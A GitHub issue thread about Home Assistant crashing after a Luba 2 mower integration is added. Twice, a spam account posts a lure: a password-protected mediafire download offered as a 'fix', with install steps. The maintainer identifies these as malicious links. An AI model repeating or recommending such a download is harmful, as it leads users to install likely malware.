### ISSUE TITLE
HA crashes

### ISSUE THREAD

**Issue by Sergey842248** [mikey0000/Mammotion-HA#95]
### The problem

If I add my Luba to through the Integration to Home Assistant, my Home Assistant crashes and isn't reachable anymore. I'm using a Raspberry Pi 5 (4GB). 
Anyone have the same problem or a solution?

### What Mammotion mower are you using?

Luba 2

### What version of the Mammotion intergration are you using?

0.1.11

### What version of Home Assistant Core are you running?

core-2024.8.3

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Sergey842248** [comment]
Why closed?

**Comment by mikey0000** [comment]
Keep getting weird bot spam posting. Sorry not closing due to your issue just trying to sort out the spam user

**Comment by Sergey842248** [comment]
> Keep getting weird bot spam posting. Sorry not closing due to your issue just trying to sort out the spam user

I'm sorry for you. I can promise I'm not. I already opened another one, so leave this closed.

**Comment by mikey0000** [comment]
Hey it's not you it's some other user posting malicious links, I deleted the comments but they were coming back again.
